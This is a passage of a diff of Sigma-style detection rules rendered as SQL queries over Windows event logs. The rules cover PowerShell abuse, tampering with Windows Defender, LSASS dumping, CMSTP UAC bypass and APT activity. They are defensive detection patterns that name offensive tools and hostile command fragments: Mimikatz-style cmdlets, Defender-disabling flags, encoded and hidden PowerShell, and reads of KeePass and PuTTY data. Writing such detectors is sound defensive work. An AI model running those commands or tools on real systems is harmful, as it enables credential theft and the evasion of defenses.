'%gatherNetworkInfo.vbs%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' ESCAPE '\\')))" ], - "filename": "posh_pc_delete_volume_shadow_copies.yml" + "filename": "proc_creation_win_susp_gather_network_info_execution.yml" }, { - "title": "Remote PowerShell Session (PS Classic)", - "id": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "title": "PUA - DIT Snapshot Viewer", + "id": "d3b70aad-097e-409c-9df2-450f80dc476b", "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit.", + "author": "Furkan Caliskan (@caliskanfurkan_)", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.credential_access", + "attack.t1003.003" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate admin usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '400' AND Channel = 'Windows PowerShell' AND HostName = 'ServerRemoteHost' AND HostApplication LIKE '%wsmprovhost.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ditsnap.exe' ESCAPE '\\' OR CommandLine LIKE '%ditsnap.exe%' ESCAPE '\\'))" ], - "filename": "posh_pc_remote_powershell_session.yml" + "filename": "proc_creation_win_pua_ditsnap.yml" }, { - "title": "Tamper Windows Defender - PSClassic", - "id": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "title": "HackTool - HandleKatz LSASS Dumper Execution", + "id": "ca621ba5-54ab-4035-9942-d378e6fcde3c", "status": "experimental", - "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", - "author": "frack113", + "description": "Detects the use of HandleKatz, a tool that demonstrates the usage of cloned handles to Lsass in order to create an obfuscated memory dump of the same", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.t1003.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '600' AND Channel = 'Windows PowerShell') AND ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND (HostApplication LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR HostApplication LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR HostApplication LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((HostApplication LIKE '%Set-MpPreference%' ESCAPE '\\' AND HostApplication LIKE '%Allow%' ESCAPE '\\' AND (HostApplication LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR HostApplication LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (HostApplication LIKE '%ltdefac %' ESCAPE '\\' OR HostApplication LIKE '%mtdefac %' ESCAPE '\\' OR HostApplication LIKE '%htdefac %' ESCAPE '\\' OR HostApplication LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\loader.exe' ESCAPE '\\' AND CommandLine LIKE '%--pid:%' ESCAPE '\\') OR (Imphash IN ('38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650') OR Hashes IN ('IMPHASH=38D9E015591BBFD4929E0D0F47FA0055', 'IMPHASH=0E2216679CA6E1094D63322E3412D650')) OR (CommandLine LIKE '%--pid:%' ESCAPE '\\' AND CommandLine LIKE '%--outfile:%' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%.obf%' ESCAPE '\\' OR CommandLine LIKE '%dump%' ESCAPE '\\'))))" ], - "filename": "posh_pc_tamper_with_windows_defender.yml" + "filename": "proc_creation_win_hktl_handlekatz.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic - PowerShell Module", - "id": "bbb80e91-5746-4fbe-8898-122e2cafdbf4", - "status": "experimental", - "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "title": "Tasks Folder Evasion", + "id": "cc4e02ba-9c06-48e2-b09e-2500cace9ae0", + "status": "test", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", + "author": "Sreeman", "tags": [ + "attack.defense_evasion", + "attack.persistence", "attack.execution", - "attack.t1059.001" + "attack.t1574.002" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ContextInfo LIKE '% -enc %' ESCAPE '\\' OR ContextInfo LIKE '% -EncodedCommand %' ESCAPE '\\' OR ContextInfo LIKE '% -ec %' ESCAPE '\\') AND (ContextInfo LIKE '% -w hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -window hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ContextInfo LIKE '% -w 1 %' ESCAPE '\\') AND (ContextInfo LIKE '% -noni %' ESCAPE '\\' OR ContextInfo LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%echo %' ESCAPE '\\' OR CommandLine LIKE '%copy %' ESCAPE '\\' OR CommandLine LIKE '%type %' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\') AND (CommandLine LIKE '% C:\\\\Windows\\\\System32\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '% C:\\\\Windows\\\\SysWow64\\\\Tasks\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_susp_invocation_generic.yml" + "filename": "proc_creation_win_susp_task_folder_evasion.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA - PowerShell Module", - "id": "07ad2ea8-6a55-4ac6-bf3e-91b8e59676eb", - "status": "experimental", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Potential PowerShell Execution Via DLL", + "id": "6812a10b-60ea-420c-832f-dfcc33b646ba", + "status": "test", + "description": "Detects potential PowerShell execution from a DLL instead of the usual PowerShell process as seen used in PowerShdll", + "author": "Markus Neis, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload LIKE '%set%' ESCAPE '\\' AND Payload LIKE '%&&%' ESCAPE '\\' AND Payload LIKE '%mshta%' ESCAPE '\\' AND Payload LIKE '%vbscript:createobject%' ESCAPE '\\' AND Payload LIKE '%.run%' ESCAPE '\\' AND Payload LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR Image LIKE '%\\\\regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RUNDLL32.EXE', 'RegSvcs.exe', 'InstallUtil.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%Default.GetString%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Expression%' ESCAPE '\\' OR CommandLine LIKE '%IEX %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Command%' ESCAPE '\\' OR CommandLine LIKE '%ICM %' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\'))" ], - "filename": "posh_pm_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_powershell_dll_execution.yml" }, { - "title": "Malicious PowerShell Commandlets - PoshModule", - "id": "7d0d0329-0ef1-4e84-a9f5-49500f9d7c6c", + "title": "OilRig APT Activity", + "id": "ce6e34ca-966d-41c9-8d93-5b06c8b97a06", "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects OilRig activity as reported by Nyotron in their March 2018 report", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", "tags": [ - "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", - "attack.t1059.001" + "attack.persistence", + "attack.g0049", + "attack.t1053.005", + "attack.s0111", + "attack.t1543.003", + "attack.defense_evasion", + "attack.t1112", + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%Add-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Add-Persistence%' ESCAPE '\\' OR Payload LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR Payload LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR Payload LIKE '%Check-VM%' ESCAPE '\\' OR Payload LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR Payload LIKE '%Decrypt-Hash%' ESCAPE '\\' OR Payload LIKE '%Do-Exfiltration%' ESCAPE '\\' OR Payload LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR Payload LIKE '%Exploit-Jboss%' ESCAPE '\\' OR Payload LIKE '%Find-Fruit%' ESCAPE '\\' OR Payload LIKE '%Find-GPOLocation%' ESCAPE '\\' OR Payload LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR Payload LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR Payload LIKE '%Get-ChromeDump%' ESCAPE '\\' OR Payload LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR Payload LIKE '%Get-FoxDump%' ESCAPE '\\' OR Payload LIKE '%Get-GPPPassword%' ESCAPE '\\' OR Payload LIKE '%Get-IndexedItem%' ESCAPE '\\' OR Payload LIKE '%Get-Keystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-LSASecret%' ESCAPE '\\' OR Payload LIKE '%Get-PassHashes%' ESCAPE '\\' OR Payload LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR Payload LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR Payload LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR Payload LIKE '%Get-RickAstley%' ESCAPE '\\' OR Payload LIKE '%Get-Screenshot%' ESCAPE '\\' OR Payload LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServicePermission%' ESCAPE '\\' OR Payload LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR Payload LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR Payload LIKE '%Get-System%' ESCAPE '\\' OR Payload LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR Payload LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR Payload LIKE '%Get-Unconstrained%' ESCAPE '\\' OR Payload LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR Payload LIKE '%Get-VaultCredential%' ESCAPE '\\' OR Payload LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR Payload LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR Payload LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR Payload LIKE '%HTTP-Login%' ESCAPE '\\' OR Payload LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR Payload LIKE '%Install-SSP%' ESCAPE '\\' OR Payload LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR Payload LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR Payload LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR Payload LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR Payload LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR Payload LIKE '%Invoke-Certify%' ESCAPE '\\' OR Payload LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DAFT%' ESCAPE '\\' OR Payload LIKE '%Invoke-DCSync%' ESCAPE '\\' OR Payload LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR Payload LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR Payload LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR Payload LIKE '%Invoke-Farmer%' ESCAPE '\\' OR Payload LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR Payload LIKE '%Invoke-Gopher%' ESCAPE '\\' OR Payload LIKE '%Invoke-Grouper%' ESCAPE '\\' OR Payload LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR Payload LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR Payload LIKE '%Invoke-InteractiveSystemPowerShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Internalmonologue%' ESCAPE '\\' OR Payload LIKE '%Invoke-Inveigh%' ESCAPE '\\' OR Payload LIKE '%Invoke-InveighRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-KrbRelay%' ESCAPE '\\' OR Payload LIKE '%Invoke-LdapSignCheck%' ESCAPE '\\' OR Payload LIKE '%Invoke-Lockless%' ESCAPE '\\' OR Payload LIKE '%Invoke-MalSCCM%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-Mimikittenz%' ESCAPE '\\' OR Payload LIKE '%Invoke-MITM6%' ESCAPE '\\' OR Payload LIKE '%Invoke-NanoDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-NetRipper%' ESCAPE '\\' OR Payload LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR Payload LIKE '%Invoke-NinjaCopy%' ESCAPE '\\' OR Payload LIKE '%Invoke-OfficeScrape%' ESCAPE '\\' OR Payload LIKE '%Invoke-OxidResolver%' ESCAPE '\\' OR Payload LIKE '%Invoke-P0wnedshell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Paranoia%' ESCAPE '\\' OR Payload LIKE '%Invoke-PortScan%' ESCAPE '\\' OR Payload LIKE '%Invoke-PoshRatHttp%' ESCAPE '\\' OR Payload LIKE '%Invoke-PostExfil%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellTCP%' ESCAPE '\\' OR Payload LIKE '%Invoke-PowerShellWMI%' ESCAPE '\\' OR Payload LIKE '%Invoke-PPLDump%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-PSInject%' ESCAPE '\\' OR Payload LIKE '%Invoke-PsUaCme%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReflectivePEInjection%' ESCAPE '\\' OR Payload LIKE '%Invoke-ReverseDNSLookup%' ESCAPE '\\' OR Payload LIKE '%Invoke-Rubeus%' ESCAPE '\\' OR Payload LIKE '%Invoke-RunAs%' ESCAPE '\\' OR Payload LIKE '%Invoke-SafetyKatz%' ESCAPE '\\' OR Payload LIKE '%Invoke-SauronEye%' ESCAPE '\\' OR Payload LIKE '%Invoke-SCShell%' ESCAPE '\\' OR Payload LIKE '%Invoke-Seatbelt%' ESCAPE '\\' OR Payload LIKE '%Invoke-ServiceAbuse%' ESCAPE '\\' OR Payload LIKE '%Invoke-ShadowSpray%' ESCAPE '\\' OR Payload LIKE '%Invoke-Sharp%' ESCAPE '\\' OR Payload LIKE '%Invoke-Shellcode%' ESCAPE '\\' OR Payload LIKE '%Invoke-SMBScanner%' ESCAPE '\\' OR Payload LIKE '%Invoke-Snaffler%' ESCAPE '\\' OR Payload LIKE '%Invoke-Spoolsample%' ESCAPE '\\' OR Payload LIKE '%Invoke-SpraySinglePassword%' ESCAPE '\\' OR Payload LIKE '%Invoke-SSHCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-StandIn%' ESCAPE '\\' OR Payload LIKE '%Invoke-StickyNotesExtract%' ESCAPE '\\' OR Payload LIKE '%Invoke-SystemCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tasksbackdoor%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tater%' ESCAPE '\\' OR Payload LIKE '%Invoke-Thunderfox%' ESCAPE '\\' OR Payload LIKE '%Invoke-ThunderStruck%' ESCAPE '\\' OR Payload LIKE '%Invoke-TokenManipulation%' ESCAPE '\\' OR Payload LIKE '%Invoke-Tokenvator%' ESCAPE '\\' OR Payload LIKE '%Invoke-TotalExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-UrbanBishop%' ESCAPE '\\' OR Payload LIKE '%Invoke-UserHunter%' ESCAPE '\\' OR Payload LIKE '%Invoke-VoiceTroll%' ESCAPE '\\' OR Payload LIKE '%Invoke-Whisker%' ESCAPE '\\' OR Payload LIKE '%Invoke-WinEnum%' ESCAPE '\\' OR Payload LIKE '%Invoke-winPEAS%' ESCAPE '\\' OR Payload LIKE '%Invoke-WireTap%' ESCAPE '\\' OR Payload LIKE '%Invoke-WmiCommand%' ESCAPE '\\' OR Payload LIKE '%Invoke-WMIExec%' ESCAPE '\\' OR Payload LIKE '%Invoke-WScriptBypassUAC%' ESCAPE '\\' OR Payload LIKE '%Invoke-Zerologon%' ESCAPE '\\' OR Payload LIKE '%MailRaider%' ESCAPE '\\' OR Payload LIKE '%New-HoneyHash%' ESCAPE '\\' OR Payload LIKE '%New-InMemoryModule%' ESCAPE '\\' OR Payload LIKE '%Out-Minidump%' ESCAPE '\\' OR Payload LIKE '%Port-Scan%' ESCAPE '\\' OR Payload LIKE '%PowerBreach%' ESCAPE '\\' OR Payload LIKE '%powercat %' ESCAPE '\\' OR Payload LIKE '%PowerUp%' ESCAPE '\\' OR Payload LIKE '%PowerView%' ESCAPE '\\' OR Payload LIKE '%Remove-Update%' ESCAPE '\\' OR Payload LIKE '%Set-MacAttribute%' ESCAPE '\\' OR Payload LIKE '%Set-Wallpaper%' ESCAPE '\\' OR Payload LIKE '%Show-TargetScreen%' ESCAPE '\\' OR Payload LIKE '%Start-CaptureServer%' ESCAPE '\\' OR Payload LIKE '%Start-WebcamRecorder%' ESCAPE '\\' OR Payload LIKE '%VolumeShadowCopyTools%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%SC Scheduled Scan%' ESCAPE '\\' AND CommandLine LIKE '%\\\\microsoft\\\\Taskbar\\\\autoit3.exe%' ESCAPE '\\') OR (Image LIKE '%\\\\Windows\\\\Temp\\\\DB\\\\%' ESCAPE '\\' AND Image LIKE '%.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\system32\\\\Service.exe' ESCAPE '\\' AND (CommandLine LIKE '%i%' ESCAPE '\\' OR CommandLine LIKE '%u%' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\local\\\\microsoft\\\\Taskbar\\\\autoit3.exe' ESCAPE '\\' AND CommandLine LIKE '%nslookup.exe%' ESCAPE '\\' AND CommandLine LIKE '%-q=TXT%' ESCAPE '\\')))" ], - "filename": "posh_pm_malicious_commandlets.yml" + "filename": "proc_creation_win_apt_oilrig_mar18.yml" }, { - "title": "Bad Opsec Powershell Code Artifacts", - "id": "8d31a8ce-46b5-4dd6-bdc3-680931f1db86", + "title": "Operation Wocao Activity", + "id": "1cfac73c-be78-4f9a-9b08-5bde0c3953ab", "status": "test", - "description": "focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including\nCobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads \nthat often undergo minimal changes by attackers due to bad opsec.\n", - "author": "ok @securonix invrep_de, oscd.community", + "description": "Detects activity mentioned in Operation Wocao report", + "author": "Florian Roth (Nextron Systems), frack113", "tags": [ + "attack.discovery", + "attack.t1012", + "attack.defense_evasion", + "attack.t1036.004", + "attack.t1027", "attack.execution", + "attack.t1053.005", "attack.t1059.001" ], "falsepositives": [ - "Moderate-to-low; Despite the shorter length/lower entropy for some of these, because of high specificity, fp appears to be fairly limited in many environments." + "Administrators that use checkadmin.exe tool to enumerate local administrators" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (Payload LIKE '%$DoIt%' ESCAPE '\\' OR Payload LIKE '%harmj0y%' ESCAPE '\\' OR Payload LIKE '%mattifestation%' ESCAPE '\\' OR Payload LIKE '%\\_RastaMouse%' ESCAPE '\\' OR Payload LIKE '%tifkin\\_%' ESCAPE '\\' OR Payload LIKE '%0xdeadbeef%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%checkadmin.exe 127.0.0.1 -all%' ESCAPE '\\' OR CommandLine LIKE '%netsh advfirewall firewall add rule name=powershell dir=in%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c powershell.exe -ep bypass -file c:\\\\s.ps1%' ESCAPE '\\' OR CommandLine LIKE '%/tn win32times /f%' ESCAPE '\\' OR CommandLine LIKE '%create win32times binPath=%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\windows\\\\system32\\\\devmgr.dll%' ESCAPE '\\' OR CommandLine LIKE '% -exec bypass -enc JgAg%' ESCAPE '\\' OR CommandLine LIKE '%type %keepass\\\\KeePass.config.xml%' ESCAPE '\\' OR CommandLine LIKE '%iie.exe iie.txt%' ESCAPE '\\' OR CommandLine LIKE '%reg query HKEY\\_CURRENT\\_USER\\\\Software\\\\%\\\\PuTTY\\\\Sessions\\\\%' ESCAPE '\\'))" ], - "filename": "posh_pm_bad_opsec_artifacts.yml" + "filename": "proc_creation_win_apt_wocao.yml" }, { - "title": "Remote PowerShell Session (PS Module)", - "id": "96b9f619-aa91-478f-bacb-c3e50f8df575", - "status": "test", - "description": "Detects remote PowerShell sessions", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "title": "CMSTP UAC Bypass via COM Object Access", + "id": "4b60e6f2-bf39-47b4-b4ea-398e33cfe253", + "status": "stable", + "description": "Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)", + "author": "Nik Seetharaman, Christian Burkard (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.006" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1218.003", + "attack.g0069", + "car.2019-04-001" ], "falsepositives": [ - "Legitimate use remote PowerShell sessions" + "Legitimate CMSTP use (unlikely in modern enterprise environments)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ContextInfo LIKE '% = ServerRemoteHost %' ESCAPE '\\' AND ContextInfo LIKE '%wsmprovhost.exe%' ESCAPE '\\') AND NOT ((ContextInfo LIKE '%\\\\Windows\\\\system32\\\\WindowsPowerShell\\\\v1.0\\\\Modules\\\\Microsoft.PowerShell.Archive\\\\Microsoft.PowerShell.Archive.psm1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND (ParentCommandLine LIKE '% /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}%' ESCAPE '\\' OR ParentCommandLine LIKE '% /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}%' ESCAPE '\\') AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "posh_pm_remote_powershell_session.yml" + "filename": "proc_creation_win_uac_bypass_cmstp_com_object_access.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher - PowerShell Module", - "id": "a136cde0-61ad-4a61-9b82-8dc490e60dd2", + "title": "Suspicious Schtasks From Env Var Folder", + "id": "81325ce1-be01-4250-944f-b4789644556f", "status": "experimental", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Benign scheduled tasks creations or executions that happen often during software installations", + "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4103' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND Payload REGEXP '.*cmd.{0,5}(?:/c|/r).+clip(?:\\.exe)?.{0,4}&&.+clipboard]::\\(\\s\\\\\"\\{\\d\\}.+-f.+\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs%' ESCAPE '\\')) OR (ParentCommandLine LIKE '%\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' AND (CommandLine 